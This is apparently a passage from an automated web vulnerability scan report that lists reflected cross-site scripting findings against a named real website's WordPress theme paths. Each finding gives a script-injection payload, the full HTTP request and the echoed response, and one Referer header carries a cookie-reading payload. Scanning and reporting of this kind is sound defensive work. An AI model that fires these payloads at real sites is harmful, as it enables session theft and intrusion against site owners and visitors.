Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentda186\"><script>alert(1)</script>71a56d9e553/themes/rt_mynxx_wp/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.260. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18d1"><script>alert(1)</script>7f62ea5354e was submitted in the REST URL parameter 2. This input was echoed as e18d1\"><script>alert(1)</script>7f62ea5354e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themese18d1"><script>alert(1)</script>7f62ea5354e/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themese18d1\"><script>alert(1)</script>7f62ea5354e/rt_mynxx_wp/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.261. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cca"><script>alert(1)</script>e5cef24f8c9 was submitted in the REST URL parameter 3. This input was echoed as 95cca\"><script>alert(1)</script>e5cef24f8c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp95cca"><script>alert(1)</script>e5cef24f8c9/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp95cca\"><script>alert(1)</script>e5cef24f8c9/js/rokmoomenu.js" type="hidden" />
...[SNIP]...

1.262. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp